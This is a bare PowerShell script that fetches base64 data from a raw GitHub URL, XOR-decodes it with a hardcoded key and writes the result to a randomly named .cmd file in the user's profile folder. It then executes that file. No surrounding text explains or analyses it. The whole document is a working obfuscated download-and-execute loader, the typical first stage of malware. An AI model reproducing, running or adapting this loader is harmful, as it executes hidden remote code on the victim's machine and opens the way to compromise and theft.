$u='https://raw.githubusercontent.com/yorinmaj22/uwu/refs/heads/main/oc'

try {
    $k = 'moon'
    if (!$u) { throw 'Missing URL' }

    Add-Type 'using System.Net;public class D{public static string G(string u){using(var w=new WebClient())return w.DownloadString(u);}}'

    $b = [Convert]::FromBase64String(([D]::G($u) -replace '\s'))
    $x = [Text.Encoding]::UTF8.GetBytes($k)
    $o = [byte[]](0..($b.Length - 1) | ForEach-Object {
        $b[$_] -bxor $x[$_ % $x.Length]
    })
    $file = "$env:USERPROFILE\fhdsb.cmd"
    [IO.File]::WriteAllBytes($file, $o)
    & $file
}
catch {
    Write-Host "Error: $($_.Exception.Message)"
}
